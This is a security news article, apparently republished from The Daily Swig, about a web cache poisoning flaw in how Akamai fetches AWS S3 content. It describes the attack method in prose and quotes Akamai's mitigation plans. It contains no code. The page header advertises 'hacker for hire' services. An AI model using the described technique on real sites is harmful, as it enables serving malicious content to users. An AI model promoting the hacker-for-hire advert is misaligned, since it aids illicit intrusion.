Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us:

Mobile Hacker For Hire, hire a hacker, hiring a hacker, hacker with proof

Akamai wrestles with AWS S3 web cache poisoning bug

Table of Contents

Definitive solution is ‘non-trivial’ since behavior arises from customers processing non-RFC compliant requests

Akamai wrestles with AWS S3 web cache poisoning bug

A vulnerability in how Akamai retrieves Amazon Web Services (AWS) S3 resources could allow attackers to stage web cache poisoning attacks against websites.

Web cache poisoning involves malicious clients forcing content delivery networks (CDN) or web servers to cache malicious content and later serve it to other clients requesting the same resource.

Double misconfiguration

Akamai can map various HTTP requests to their corresponding S3 bucket and cache them for later retrieval. Security researcher Tarunkant Gupta discovered that he could trick the Akamai server into caching files from malicious buckets.

“A few months back I encountered a non-exploitable AWS S3 misconfiguration and I was just revisiting it to check if that still exists or not, but this time I wanted to explore all attack possibilities,” he told The Daily Swig. After trying different attack vectors, Gupta ran into a misconfiguration in Akamai’s cache servers that could be leveraged to exploit the S3 bug.

RELATED Akamai WAF bypassed via Spring Boot to trigger RCE

Akamai said creating “a blanket ‘patch’” was “not trivial, as that may have a big negative impact on legitimate internet traffic”, according to a technical writeup from Gupta. In the meantime, Gupta said users can protect themselves by not accepting any headers containing Unicode characters at the Akamai level. 

Tampering header commands

To exploit the vulnerability, an attacker must send a web request for a benign file, but modify the header directives to add a header preceded by a hex value (e.g. ) and followed by the malicious S3 address.

If the request results in a cache hit, then the Akamai server will prioritize the header with the Unicode value over the original header and cache the malicious file to serve it to future users who request the same path.

“Because of the S3 misconfiguration, it prioritizes the first header over the target origin and Akamai’s incorrect parsing on the inclusion of Unicode character let me pass exactly what I wanted to the S3 buckets, a malicious host on the first occurrence of the header,” Gupta explained.

Attacking at scale

The attack will only work if benign and malign files are stored in S3 buckets located in the same region. The attacker can create S3 buckets in all available regions and upload the malicious file to all of them.

Exploiting the bug would then be a matter of brute-forcing the web cache poisoning attack on the target web resource to see which bucket works.

Gupta tested the attack with an SVG file, which is usually a cached file type and can contain JavaScript code – making it especially dangerous. But the attack can also work with any other file type cached by the server.

Gupta also developed a pair of Python scripts that can find targets stored in S3 buckets and cached by Akamai.

“This issue is very easy to exploit, and one simple cURL can create a malicious cache,” Gupta said. “An automation script was created to exploit at scale. This issue can result in various types of attacks such as XSS, JavaScript injection, open redirection, DoS, spoofing, etc.”

RFC non-compliance

Akamai told Gupta that the configuration issue “results from certain customers’ needs to process non-RFC compliant requests for their applications to function correctly, and therefore cloud vendors offering features to support such traffic unless explicitly instructed not to do so.”

Kaan Onarlioglu, senior infosec architect at Akamai, told The Daily Swig: “By default, Akamai edge servers allow certain invalid HTTP headers to pass through, treating them as custom headers.”

Catch up with the latest hacking techniques news and analysis

This feature is necessary to support large volumes of legitimate traffic flows and origin applications that rely on invalid headers to function correctly, he said. However, it could sometimes lead to unexpected interactions between Akamai and origin servers, depending on the origin’s request processing behavior.

“Akamai provides a strict header parsing configuration option to block traffic containing invalid headers, and we strongly urge our customers to utilize it unless that interferes with their operations,” Onarlioglu continued.

According to Onarlioglu, Akamai is currently working on making strict header parsing a default behavior instead of offering an opt-out mechanism for customers. The work is expected to be finalized early in 2023.

Gupta advised web developers to always follow RFC and its recommendations. “Many companies don’t follow them and also don’t put any countermeasures around it, which sometimes becomes a serious issue,” he said.

RECOMMENDED Researcher discovers 70 web cache poisoning vulnerabilities, nets $40k in bug bounty rewards

Leave a Reply

Your email address will not be published. Required fields are marked *

error: Content is protected !!